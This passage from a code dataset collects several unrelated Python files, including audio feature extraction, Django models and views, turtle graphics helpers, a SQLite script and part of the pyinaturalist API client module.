asciiify(s).lower()\n","sub_path":"paperoni/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424103123","text":"__author__ = 'lewiskit'\n\n\nfrom audioExt import AudioExtract\nfrom genAudioFeatures import GenAudFea\nfrom audioOfTalk import AudioOfTalk\n\n\n# the absolute path of video, this one is better than the synced one\nor_path_complete = \"/usr1/RapportVideo/ConvertedMP4\"\n\n# output path of the audio, split audio and audio features extracted from openSMILE\nout_path_10 = \"/usr0/proj/Research/Projects/Rapport/_RawData/Audio/or_audio_all_6s\"\n\n# absolute path of binary openSMILE toolkit\nsmile_path = '/usr0/home/lfenng/openSMILE-2.1.0'\n\n# the audio feature set, this set is The INTERSPEECH 2010 Paralinguistic Challenge feature set\nconfig_name = 'IS10_paraling.conf'\n\n# time of split audio or video\ntimestamp = 6\n\n'''\nConstructor\n:param absolute path of original video data\n:param output dir of audio, split audio, audio features\n:param time stamp\n'''\n# auoExt = AudioExtract(or_path_complete, out_path_10, timestamp=timestamp)\n\n'''\nExtract total audio from video processing\n'''\n# auoExt.gen_audio_process()\n\n'''\nExtract split audio from the former extracted audio\n'''\n# auoExt.gen_split_audio_process()\n\n\n\"\"\"\n generated features from split audio\n\"\"\"\n\n'''\nConstructor\n:param openSMILE toolkit path\n:param the absolute path of audio files, and the extracted files would be the same directory\n:param feature set to use\n'''\n# genAudFeature = GenAudFea(smile_path, out_path_10, config_name)\n\n'''\nGenerating new features dataSet\n'''\n# genAudFeature.gen_feature_process()\n\n\n\"\"\"\nThe following is an additional function: to split videos into timestamp video\nCurrently it is of no use.\n\"\"\"\n\nout_dir = '/usr0/proj/Research/Projects/Rapport/_RawData/Video/split_video'\n'''\nve = VideoExtract(or_path, out_dir, timestamp)\nve.gen_split_process()\n'''\n\npoint_dir = '/usr0/home/lfenng/mix-sd'\n# '/Users/lewiskit/Downloads/mix-sd'\n\n\nworkspace = '/usr0/home/lfenng/talkAudio'\n\n# directory names of the original videos, since it is not a continuous processing, just enum each 
of them\ndir_names = ['Dyad09',\n 'Dyad10', 'Dyad13']\n\n# the same function as below\nst_names = ['D9', 'D10', 'D13']\n\n\naudioOfTalk = AudioOfTalk(point_dir, or_path_complete, workspace, smile_path, 3, config_name,dir_names,st_names)\naudioOfTalk.get_audio_process()\n\n\n","sub_path":"ExtractFeatures/testExt3.py","file_name":"testExt3.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"188296001","text":"\"\"\"MS file parsing tests\r\nThe Dataframe returned after the parsing is huge and hence it is\r\ncumbersome to check for the correctness of each and every value.\r\nTherefore, a check is made only on the object type and its dimensionality\r\n\"\"\"\r\n\r\nfrom ms_file_parsing import MSFileParser\r\nimport os\r\nimport pandas as pd\r\nTEST_FOLDER = os.path.dirname(__file__)\r\nMS_FILE_PATH_mzML = os.path.join(TEST_FOLDER, \"data/tiny.pwiz.1.1.mzML\")\r\nMS_FILE_PATH_mzXML = os.path.join(TEST_FOLDER, \"data/raftflow10.mzXML\")\r\n\r\nclass TestMSFileParser:\r\n \"\"\"Unit tests for the MSFileParser class.\"\"\"\r\n\r\n def test_parser(self):\r\n \"\"\"Checks whether the MSFileParser class correctly extracts the required attributes\"\"\"\r\n\r\n # test for mzML file\r\n parsing_instance_mzML = MSFileParser(ms_file_input=MS_FILE_PATH_mzML)\r\n output_mzML = parsing_instance_mzML.parser()\r\n output_mzML_shape = output_mzML.shape\r\n assert isinstance(output_mzML,pd.DataFrame) # check for returned output is a dataframe\r\n assert output_mzML_shape == (3,5) # check for correct dimension\r\n\r\n # test for mzXML file\r\n parsing_instance_mzXML = MSFileParser(ms_file_input=MS_FILE_PATH_mzXML)\r\n output_mzXML = parsing_instance_mzXML.parser()\r\n output_mzXML_shape = output_mzXML.shape\r\n assert isinstance(output_mzXML, pd.DataFrame) # check for returned output is a dataframe\r\n assert output_mzXML_shape == (4064, 5) # check for correct dimension\r\n\r\n\r\n","sub_path":"MS_Project/spectra_package/tests/test_ms_file_parsing.py","file_name":"test_ms_file_parsing.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"647638145","text":"import re\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\n\ndef decimal_to_str(decimal):\n if not decimal:\n return None\n in_num = False\n num_str = \"\"\n for d in str(decimal)[::-1]:\n if not in_num:\n if d == \".\":\n in_num = True\n continue\n if d == \"0\":\n continue\n\n in_num = True\n num_str += d\n return num_str[::-1]\n\n\nclass Monster(models.Model):\n class Meta:\n verbose_name = 'Monster'\n verbose_name_plural = 'Monster'\n ordering = ['id']\n\n bild = models.ImageField(blank=True, null=True)\n\n name = models.CharField(max_length=100, default='', unique=True)\n rang = models.IntegerField(null=True, blank=True, validators=[MinValueValidator(-1000000), MaxValueValidator(1000000)])\n größe = models.DecimalField('größe', max_digits=6, decimal_places=3, validators=[MinValueValidator(0)], null=True, blank=True)\n gewicht = models.DecimalField('gewicht', max_digits=8, decimal_places=3, validators=[MinValueValidator(0)], null=True, blank=True)\n hp = models.IntegerField(null=True, blank=True)\n schadensverhinderung = models.CharField(max_length=20, null=True, blank=True)\n habitat = models.TextField(max_length=1000, null=True, blank=True)\n beschreibung = models.TextField(max_length=3000, null=True, 
blank=True)\n\n attacken = models.ManyToManyField(\"Attacke\", blank=True)\n typen = models.ManyToManyField(\"Typ\", blank=True)\n\n def bild_url(self):\n if self.bild and hasattr(self.bild, 'url'):\n return self.bild.url\n else:\n return '/media/files/atom.png'\n\n def rangordnung(self):\n return_generationen = ''\n return_stufen = ''\n return_str = ''\n\n rang = self.rang\n if rang is None: return None\n\n # value itself and higher, starting at the top\n generationen = [(1000000, \"S\"), (100000, \"E\"), (10000, \"A\"), (1000, \"MA\"), (501, \"N\")]\n stufen = [(500, \"S\"), (400, \"E\"), (300, \"K\"), (200, \"O\"), (100, \"M\"), (0, \"U\")]\n\n if rang < 0:\n return_str = \"-\"\n rang *= -1\n\n # 0 -> generationen, 1 -> stufen\n for i_stufe in range(2):\n list = generationen if not i_stufe else stufen\n\n for i in range(len(list)):\n\n # prohibit e.g. 0US00\n if rang == 0: break\n\n # cases SS and SG\n if i == 0:\n if rang == list[i][0]:\n return_str += list[i][1] + \"0\"\n rang -= list[i][0]\n\n # all other cases descending, if needed\n if rang >= list[i][0]:\n # else only for US, therefore prefix != 0 only there possible\n digit = rang // list[i][0] - 1 if list[i][0] else rang\n\n prefix = digit // 10\n postfix = digit % 10\n\n # prefix-digit\n if prefix != 1: return_str += \"{}\".format(prefix)\n # Kürzel\n return_str += list[i][1]\n # postfix-digit\n if postfix != 0: return_str += \"{}\".format(postfix)\n\n # else only for US\n rang = rang % list[i][0] if list[i][0] else 0\n\n # add '-/' in between\n if len(return_str) and return_str[-1:] != \"/\":\n return_str += \"-/\"\n\n # end inner for\n\n # add the letter G | S accordingly\n if return_str:\n try:\n start = re.search(\"\\D\\d*-/$\", return_str).start()\n letter = \"G\" if not i_stufe else \"S\"\n return_str = return_str[:start+1] + letter + return_str[start+1:-2]\n except:\n letter = \"G\" if not i_stufe else \"S\"\n print(\"No start found in {} for {}\".format(letter, self.name))\n\n # transfer string back\n if not i_stufe:\n return_generationen = return_str\n else:\n return_stufen = return_str\n return_str = \"\"\n\n # end outer for (generationen & stufen)\n\n if len(return_generationen) and len(return_stufen):\n return_generationen += \"-\"\n\n return return_generationen + return_stufen\n\n def größe_(self):\n return decimal_to_str(self.größe)\n\n def gewicht_(self):\n return decimal_to_str(self.gewicht)\n\n def __str__(self):\n return \"{} (Rang {})\".format(self.name, self.rang)\n\n\nclass Typ(models.Model):\n class Meta:\n verbose_name = \"Typ\"\n verbose_name_plural = \"Typen\"\n ordering = [\"titel\"]\n\n titel = models.CharField(max_length=20, default=\"\")\n effektiv_gegen = models.ManyToManyField(\"Typ\", related_name=\"effektiv\", related_query_name=\"effektiv\", blank=True)\n schwach_gegen = models.ManyToManyField(\"Typ\", related_name=\"schwach\", related_query_name=\"schwach\", blank=True)\n wirkungslos_gegen = models.ManyToManyField(\"Typ\", related_name=\"wirkungslos\", related_query_name=\"wirkungslos\", blank=True)\n\n def __str__(self):\n return self.titel\n\n\nclass Attacke(models.Model):\n class Meta:\n verbose_name = \"Attacke\"\n verbose_name_plural = \"Attacken\"\n ordering = [\"titel\"]\n\n titel = models.CharField(max_length=20, unique=True)\n typen = models.ManyToManyField(Typ, blank=True)\n schaden = models.CharField(max_length=20, null=True, blank=True)\n beschreibung = models.TextField(max_length=3000, null=True, blank=True)\n\n def __str__(self):\n typen = \", \".join([t.titel for t in 
self.typen.all()])\n return \"{} ({}; {} HP)\".format(self.titel, typen if typen else \"-\", self.schaden)\n","sub_path":"ppServer/monster/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"590523308","text":"class Email:\r\n\r\n def __init__(self, sender, receiver, content):\r\n self.sender = sender\r\n self.receiver = receiver\r\n self.content = content\r\n self.is_send = False\r\n\r\n def send(self):\r\n self.is_send = True\r\n\r\n def get_info(self):\r\n return f'{self.sender} says to {self.receiver}: {self.content}. Sent: {self.is_send}'\r\n\r\n\r\nemails = []\r\n\r\nline = input()\r\nwhile line != 'Stop':\r\n token = line.split(' ', maxsplit=2)\r\n sender = token[0]\r\n receiver = token[1]\r\n content = token[2]\r\n email = Email(sender, receiver, content)\r\n emails.append(email)\r\n\r\n line = input()\r\n\r\nsend_emails = list(map(int, input().split(', ')))\r\n\r\nfor x in send_emails:\r\n emails[x].send()\r\n\r\nfor email in emails:\r\n print(email.get_info())","sub_path":"Emails.py","file_name":"Emails.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"96292439","text":"from django.urls import register_converter, path, include\n\nfrom . import views, converters\n\nregister_converter(converters.ProductConverter, 'product')\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('logout', views.logout, name='logout'),\n path('products//', views.product_detail,\n name='product_detail'),\n path('usage', views.usage, name='usage'),\n]\n","sub_path":"marketplace/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52091749","text":"\r\ndef vowelRemoval(string):\r\n VOWELS = (\"a\", \"e\", \"i\", \"o\", \"u\")\r\n if len(string) == 0:\r\n return string\r\n else:\r\n newString = string[1:len(string) + 1]\r\n firstLetter = string[0]\r\n \r\n if firstLetter in VOWELS:\r\n\r\n return vowelRemoval(newString)\r\n else:\r\n return firstLetter + vowelRemoval(newString)\r\n","sub_path":"Programming Coursework Completed/question 8.py","file_name":"question 8.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134515188","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render, redirect\nfrom django.views.generic.base import View\nfrom .forms import RegistrarInscricaoForm, RegistrarDocumentoForm\nfrom sc4net import get_json\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom .models import Candidato, Documento\nfrom cadastro.models import Usuario\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\n# class RegistrarInscricaoView(LoginRequiredMixin, View):\nclass RegistrarInscricaoView(View):\n template_name = 'inscricao/dados_pessoais.html'\n\n # @method_decorator(login_required)\n def get(self, request):\n return render(request, self.template_name)\n\n # @method_decorator(login_required)\n def post(self, request):\n form = RegistrarInscricaoForm(request.POST)\n\n if form.is_valid():\n dados_form = form.data\n inscrito = 
Usuario.objects.get(cpf=dados_form['cpf'])\n inscricao = Candidato.objects.create(usuario = inscrito,\n nome_civil=dados_form['nome_civil'],\n nome_social=dados_form['nome_social'],\n nome_apresentacao=dados_form['nome_apresentacao'],\n nome_usual=dados_form['nome_usual'],\n nome_mae=dados_form['nome_mae'],\n nome_pai=dados_form['nome_pai'],\n sexo=dados_form['sexo'],\n data_nascimento=dados_form['data_nascimento'],\n pais_nascimento=dados_form['pais_nascimento'],\n estado_nascimento=dados_form['estado_nascimento'],\n cidade_nascimento=dados_form['cidade_nascimento'],\n rg=dados_form['rg'],\n data_emissao=dados_form['data_emissao'],\n orgao_rg=dados_form['orgao_rg'],\n estado_emissao=dados_form['estado_emissao'],\n email=dados_form['email'],\n telefone=dados_form['telefone'],\n cep=dados_form['cep'],\n endereco=dados_form['endereco'],\n complemento=dados_form['complemento'],\n cidade=dados_form['cidade'],\n estado=dados_form['estado'],\n pais=dados_form['pais'],\n )\n\n # form1 = RegistrarDocumentoForm(request.POST)\n\n # if form1.is_valid():\n # dados_form1 = form1.data\n documento_pessoal = Documento.objects.create(candidato = inscricao,\n titulo=\"documentação pessoal\",\n arquivo=request.POST['doc_pessoal'],\n )\n documento_titulo = Documento.objects.create(candidato=inscricao,\n titulo=\"documentação de títulos\",\n arquivo=request.POST['doc_titulo'],\n )\n documento_escolar = Documento.objects.create(candidato=inscricao,\n titulo=\"documentação escolar\",\n arquivo=request.POST['doc_escolar'],\n )\n\n\n return redirect('confirmar')\n\n\n return render(request, self.template_name, {'form': form})\n\n\n\n\n def confirmarInscricao(request):\n\n\n return render(request, 'inscricao/confirmardados.html', {'inscricao': Candidato.objects.last(),'documento': Documento.objects.last()})\n\n\n\n def lista_inscricoes(request):\n return render(request, 'inscricao/listagem.html', {'inscricao': Candidato.objects.all(),'documento': Documento.objects.all()})\n\n\n\n\n# class RegistrarDocumentoView(View):\n# template_name = 'inscricao/documentacao.html'\n#\n# def get(self, request):\n# return render(request, self.template_name)\n\n # def registrarDocumento(self, request):\n #\n # render(request, 'inscricao/documentacao.html')\n #\n # form = RegistrarDocumentoForm(request.POST)\n #\n # if form.is_valid():\n # dados_form = form.data\n #\n #\n # documento = Documento.objects.create(titulo=dados_form['titulo'],\n # arquivo=request.POST['doc_pessoal'],\n # )\n #\n #\n # documento.save()\n #\n # # inscricao = Inscricao.objects.create(numero = 1,\n # # candidato = inscricao,\n # # # documento = documento,\n # # )\n # # inscricao.save()\n #\n # return redirect('index')\n #\n # return render(request, self.template_name, {'form': form})\n #","sub_path":"inscricao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307919227","text":"import sqlite3\n\nconn = sqlite3.connect('example.db')\nc=conn.cursor()\n\nc.execute('''CREATE TABLE emails\n\t\t\t(id integer, email text)''')\nfor i in range(100000):\n\tspan1 = i\n\tspan2 = \"row\" + str(i)\n\titem = (span1, span2)\n\tc.execute(\"INSERT INTO emails VALUES (?,?)\", item)\n\nconn.commit()\nconn.close()","sub_path":"sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78145448","text":"# fix for optcdftsp bug in 
another script that ran cdftsp on unoptimized geometry\n# this script takes optcdftsp.out file/directory and creates cdftsp.in using optimized geometry\n# check file names first to prevent overwriting\n\nimport ChemData as CD\nimport os, sys\n\ndef run(infile): # optcdftsp.out\n    # note that new .xyz and .in files will be placed in same directory as infile\n\n    if infile.split('.')[-1] != \"out\":\n        return None\n\n    # write optimized coordinates to a new .xyz with the same file name\n    xyz_fn = infile.split('.')[0] + \".xyz\"\n    xyz = CD.ConvergedCoordGrab(infile)\n    if xyz != []:\n        CD.WriteXYZ(xyz_fn, xyz)\n\n#    # parse charge, mult, method, basis from infile\n#    mol_flag = False\n#    with open(infile, 'r') as f:\n#        for line in f:\n#            if \"METHOD\" in line:\n#                method = line[6:].strip()\n#            elif \"BASIS\" in line:\n#                basis = line[5:].strip()\n#            elif mol_flag:\n#                mol_flag = False\n#                try:\n#                    charge, multiplicity = int(line.split(' ')[0]), int(line.split(' ')[-1])\n#                except:\n#                    continue\n#            elif \"$molecule\" in line:\n#                mol_flag = True\n\n    # generate cdftsp.in # change qcMultIn.py path if necessary\n    #os.system(\"python qcMultIn.py -f %s -c %d -m %d -method %s -basis %s -j cdftsp\" %(xyz_fn, charge, multiplicity, method, basis))\n\nif __name__ == \"__main__\":\n    input = sys.argv[1].rstrip('/')\n    if os.path.isfile(input):\n        run(input)\n    elif os.path.isdir(input):\n        for file in os.listdir(input):\n            run(input + '/' + file)\n    else:\n        print(\"Input should be a file or directory.\")\n","sub_path":"opt_coords.py","file_name":"opt_coords.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"141344443","text":"import turtle\r\nimport math\r\n\r\n\r\ndef move(turtle, x, y):\r\n    \"\"\"\r\n    Set up position of the given turtle\r\n    \"\"\"\r\n    turtle.penup()\r\n    old_speed = turtle.speed()\r\n    turtle.speed(0)\r\n    turtle.setx(x)\r\n    turtle.sety(y)\r\n    turtle.speed(old_speed)\r\n    turtle.pendown()\r\n\r\n\r\ndef make_window(color, title, width=1200, height=900):\r\n    \"\"\"\r\n    Set up the window with the given background color and title.\r\n    Returns the new window.\r\n    \"\"\"\r\n    # https://stackoverflow.com/questions/56528067/how-can-i-change-the-size-of-my-python-turtle-window\r\n    wn = turtle.Screen()\r\n    wn.setup(width + 4, height + 8)\r\n    wn.setworldcoordinates(0, 0, 1000, 850)\r\n    wn.bgcolor(color)\r\n    wn.title(title)\r\n    return wn\r\n\r\n\r\ndef make_turtle(color, size, x = 0, y = 0, shape='turtle'):\r\n    \"\"\"\r\n    Set up a turtle with the given color and pensize.\r\n    Returns the new turtle.\r\n    \"\"\"\r\n    t = turtle.Turtle()\r\n    t.color(color)\r\n    t.pensize(size)\r\n    t.shape(shape)\r\n    move(t, x, y)\r\n    return t\r\n\r\n\r\ndef get_border_sizes(wn):\r\n    x_min, x_max = - wn.window_width() // 2, wn.window_width() // 2\r\n    y_min, y_max = - wn.window_height() // 2, wn.window_height() // 2\r\n    return x_min, x_max, y_min, y_max\r\n\r\n\r\ndef print_text(x, y, textlines, color=\"black\", fontinfo=(\"Arial\", 15, \"normal\")):\r\n    t = make_turtle(color, 1, x, y, shape=\"arrow\")\r\n    t.speed(0)\r\n    for line in textlines:\r\n        _, fontsize, _ = fontinfo\r\n        t.write(line, font=fontinfo)\r\n        # step down before moving so successive lines don't overwrite each other\r\n        y -= fontsize * 1.5\r\n        move(t, x, y)\r\n    move(t, -10, -10)\r\n    t.penup()\r\n    del(t)\r\n\r\n\r\ndef draw_line(x1, y1, x2, y2, color, size, shape='arrow'):\r\n    t = make_turtle(color, size, x1, y1, shape)\r\n    t.pensize(size)\r\n    t.speed(0)\r\n    t.goto(x2, y2)\r\n    t.penup()\r\n    del(t)\r\n\r\n\r\ndef draw_polygon(\r\n    turtle,\r\n    angles,\r\n    side,\r\n
start_angle,\r\n sector_angle = 360,\r\n counterclockwise = True\r\n ):\r\n turtle.setheading(180 - start_angle)\r\n for i in range(int(angles * sector_angle / 360)):\r\n turtle.forward(side)\r\n if counterclockwise:\r\n turtle.left(360 / angles)\r\n else:\r\n turtle.right(360 / angles)\r\n\r\n\r\ndef draw_circle(turtle, radius, start_angle, counterclockwise = True):\r\n ANGLES = 100\r\n\r\n side = 2 * radius * math.sin(math.radians(360 / (2 * ANGLES)))\r\n draw_polygon(turtle, ANGLES, side, start_angle, 360, counterclockwise)\r\n\r\n\r\ndef draw_arc(\r\n turtle,\r\n radius,\r\n start_angle,\r\n sector_angle = 180,\r\n counterclockwise = True\r\n ):\r\n\r\n ANGLES = 70\r\n\r\n side = 2 * radius * math.sin(math.radians(360 / (2 * ANGLES)))\r\n draw_polygon(turtle,\r\n ANGLES,\r\n side,\r\n start_angle,\r\n sector_angle,\r\n counterclockwise\r\n )\r\n","sub_path":"6_turtle-2/Bouncing ball/turtle_helper.py","file_name":"turtle_helper.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"331870277","text":"\"\"\"\nCode to access the Node-based iNaturalist API\nSee: http://api.inaturalist.org/v1/docs/\n\nMost recent API version tested: 1.3.0\n\nFunctions\n---------\n\n.. automodsumm:: pyinaturalist.node_api\n :functions-only:\n :nosignatures:\n\n\"\"\"\nfrom logging import getLogger\nfrom typing import List\nfrom warnings import warn\n\nimport requests\n\nfrom pyinaturalist import api_docs as docs\nfrom pyinaturalist.api_requests import get\nfrom pyinaturalist.constants import API_V1_BASE_URL, HistogramResponse, JsonResponse, MultiInt\nfrom pyinaturalist.exceptions import ObservationNotFound, TaxonNotFound\nfrom pyinaturalist.forge_utils import document_request_params\nfrom pyinaturalist.pagination import add_paginate_all, paginate_all\nfrom pyinaturalist.request_params import (\n DEFAULT_OBSERVATION_ATTRS,\n NODE_OBS_ORDER_BY_PROPERTIES,\n PROJECT_ORDER_BY_PROPERTIES,\n translate_rank_range,\n validate_multiple_choice_param,\n)\nfrom pyinaturalist.response_format import (\n as_geojson_feature_collection,\n convert_all_coordinates,\n convert_all_place_coordinates,\n convert_all_timestamps,\n convert_generic_timestamps,\n convert_observation_timestamps,\n format_histogram,\n)\n\n__all__ = [\n 'get_controlled_terms',\n 'get_identifications_by_id',\n 'get_identifications',\n 'get_observation',\n 'get_observation_histogram',\n 'get_observations',\n 'get_observation_species_counts',\n 'get_geojson_observations',\n 'get_observation_observers',\n 'get_observation_identifiers',\n 'get_places_by_id',\n 'get_places_nearby',\n 'get_places_autocomplete',\n 'get_projects',\n 'get_projects_by_id',\n 'get_taxa',\n 'get_taxa_by_id',\n 'get_taxa_autocomplete',\n 'get_user_by_id',\n 'get_users_autocomplete',\n 'search',\n]\nlogger = getLogger(__name__)\n\n\ndef node_api_get(endpoint: str, **kwargs) -> requests.Response:\n \"\"\"Make an API call to iNaturalist.\n\n Args:\n endpoint: The name of an endpoint resource, not including the base URL e.g. 
'observations'\n kwargs: Arguments for :py:func:`.api_requests.request`\n \"\"\"\n return get(f'{API_V1_BASE_URL}/{endpoint}', **kwargs)\n\n\n# Controlled Terms\n# --------------------\n\n\ndef get_controlled_terms(taxon_id: int = None, user_agent: str = None) -> JsonResponse:\n \"\"\"List controlled terms and their possible values.\n A taxon ID can optionally be provided to show only terms that are valid for that taxon.\n Otherwise, all controlled terms will be returned.\n\n **API reference:**\n\n * https://api.inaturalist.org/v1/docs/#!/Controlled_Terms/get_controlled_terms\n * https://api.inaturalist.org/v1/docs/#!/Controlled_Terms/get_controlled_terms_for_taxon\n\n Example:\n\n >>> response = get_controlled_terms()\n >>> print(format_controlled_terms(response))\n 1: Life Stage\n 2: Adult\n 3: Teneral\n 4: Pupa\n ...\n\n .. admonition:: Example Response (all terms)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_controlled_terms.json\n :language: JSON\n\n .. admonition:: Example Response (for a specific taxon)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_controlled_terms_for_taxon.json\n :language: JSON\n Args:\n taxon_id: ID of taxon to get controlled terms for\n user_agent: a user-agent string that will be passed to iNaturalist.\n\n Returns:\n A dict containing details on controlled terms and their values\n\n Raises:\n :py:exc:`.TaxonNotFound` If an invalid taxon_id is specified\n \"\"\"\n # This is actually two endpoints, but they are so similar it seems best to combine them\n endpoint = 'controlled_terms/for_taxon' if taxon_id else 'controlled_terms'\n response = node_api_get(endpoint, params={'taxon_id': taxon_id}, user_agent=user_agent)\n\n # controlled_terms/for_taxon returns a 422 if the specified taxon does not exist\n if response.status_code in (404, 422):\n raise TaxonNotFound\n response.raise_for_status()\n return response.json()\n\n\n# Identifications\n# --------------------\n\n\ndef get_identifications_by_id(identification_id: MultiInt, user_agent: str = None) -> JsonResponse:\n \"\"\"Get one or more identification records by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Identifications/get_identifications_id\n\n Example:\n\n >>> get_identifications_by_id(155554373)\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_identifications.py\n\n Args:\n identification_id: Get taxa with this ID. 
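get_controlled_terms above maps a 404/422 response to TaxonNotFound instead of letting a bare HTTPError escape, so callers can fall back cleanly to the full term list. A hedged usage sketch (the taxon ID is only an example, and the 'label' field is what iNaturalist controlled-term records are expected to carry):

from pyinaturalist.exceptions import TaxonNotFound
from pyinaturalist.node_api import get_controlled_terms

try:
    # 47219 (western honey bee) is just an illustrative taxon ID
    terms = get_controlled_terms(taxon_id=47219)
except TaxonNotFound:
    terms = get_controlled_terms()  # fall back to the full list of terms

for term in terms.get('results', []):
    print(term['id'], term['label'])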
Multiple values are allowed.\n\n Returns:\n Response dict containing identification records\n \"\"\"\n r = node_api_get('identifications', ids=identification_id, user_agent=user_agent)\n r.raise_for_status()\n\n identifications = r.json()\n identifications['results'] = convert_all_timestamps(identifications['results'])\n return identifications\n\n\n@document_request_params([docs._identification_params, docs._pagination, docs._only_id])\n@add_paginate_all(method='page')\ndef get_identifications(**params) -> JsonResponse:\n \"\"\"Search identifications.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Identifications/get_identifications\n\n Example:\n\n Get all of your own species-level identifications:\n\n >>> response = get_identifications(user_login='my_username', rank='species')\n >>> print([f\"{i['user']['login']}: {i['taxon_id']} ({i['category']})\" for i in response['results']])\n [155043569] Species: 76465 (leading) added on 2021-02-15 10:46:27-06:00 by jkcook\n [153668189] Species: 76465 (supporting) added on 2021-02-06 17:43:37+00:00 by jkcook\n [147500725] Species: 1163860 (improving) added on 2020-12-24 23:52:30+00:00 by jkcook\n ...\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_identifications.py\n\n Returns:\n Response dict containing identification records\n \"\"\"\n params = translate_rank_range(params)\n r = node_api_get('identifications', params=params)\n r.raise_for_status()\n\n identifications = r.json()\n identifications['results'] = convert_all_timestamps(identifications['results'])\n return identifications\n\n\n# Observations\n# --------------------\n\n\ndef get_observation(observation_id: int, user_agent: str = None) -> JsonResponse:\n \"\"\"Get details about a single observation by ID\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_id\n\n Example:\n\n >>> response = get_observation(16227955)\n >>> print(format_observations(response))\n [16227955] [493595] Species: Lixus bardanae observed on 2018-09-05 14:06:00+01:00 by niconoe at 54 rue des Badauds\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation.py\n\n Args:\n observation_id: Observation ID\n user_agent: a user-agent string that will be passed to iNaturalist.\n\n Returns:\n A dict with details on the observation\n\n Raises:\n :py:exc:`.ObservationNotFound` If an invalid observation is specified\n \"\"\"\n\n r = get_observations(id=observation_id, user_agent=user_agent)\n if r['results']:\n return convert_observation_timestamps(r['results'][0])\n\n raise ObservationNotFound()\n\n\n@document_request_params([*docs._get_observations, docs._observation_histogram])\ndef get_observation_histogram(**params) -> HistogramResponse:\n \"\"\"Search observations and return histogram data for the given time interval\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_histogram\n\n **Notes:**\n\n * Search parameters are the same as :py:func:`.get_observations()`, with the addition of\n ``date_field`` and ``interval``.\n * ``date_field`` may be either 'observed' (default) or 'created'.\n * Observed date ranges can be filtered by parameters ``d1`` and ``d2``\n * Created date ranges can be filtered by parameters ``created_d1`` and ``created_d2``\n * ``interval`` may be one of: 'year', 'month', 'week', 'day', 'hour', 'month_of_year', or\n 'week_of_year'; spaces are also allowed instead of underscores, e.g. 
'month of year'.\n * The year, month, week, day, and hour interval options will set default values for ``d1`` and\n ``created_d1``, to limit the number of groups returned. You can override those values if you\n want data from a longer or shorter time span.\n * The 'hour' interval only works with ``date_field='created'``\n\n Example:\n\n Get observations per month during 2020 in Austria (place ID 8057)\n\n >>> response = get_observation_histogram(\n >>> interval='month',\n >>> d1='2020-01-01',\n >>> d2='2020-12-31',\n >>> place_id=8057,\n >>> )\n\n .. admonition:: Example Response (observations per month of year)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_histogram_month_of_year.py\n\n .. admonition:: Example Response (observations per month)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_histogram_month.py\n\n .. admonition:: Example Response (observations per day)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_histogram_day.py\n\n Returns:\n Dict of ``{time_key: observation_count}``. Keys are ints for 'month of year' and\\\n 'week of year' intervals, and :py:class:`~datetime.datetime` objects for all other intervals.\n \"\"\"\n r = node_api_get('observations/histogram', params=params)\n r.raise_for_status()\n return format_histogram(r.json())\n\n\n@document_request_params([*docs._get_observations, docs._pagination, docs._only_id])\n@add_paginate_all(method='id')\ndef get_observations(**params) -> JsonResponse:\n \"\"\"Search observations.\n\n **API reference:** http://api.inaturalist.org/v1/docs/#!/Observations/get_observations\n\n Example:\n\n Get observations of Monarch butterflies with photos + public location info,\n on a specific date in the provice of Saskatchewan, CA (place ID 7953):\n\n >>> response = get_observations(\n >>> taxon_name='Danaus plexippus',\n >>> created_on='2020-08-27',\n >>> photos=True,\n >>> geo=True,\n >>> geoprivacy='open',\n >>> place_id=7953,\n >>> )\n\n Get basic info for observations in response:\n\n >>> from pyinaturalist.formatters import format_observations\n >>> print(format_observations(response))\n '[57754375] Species: Danaus plexippus (Monarch) observed by samroom on 2020-08-27 at Railway Ave, Wilcox, SK'\n '[57707611] Species: Danaus plexippus (Monarch) observed by ingridt3 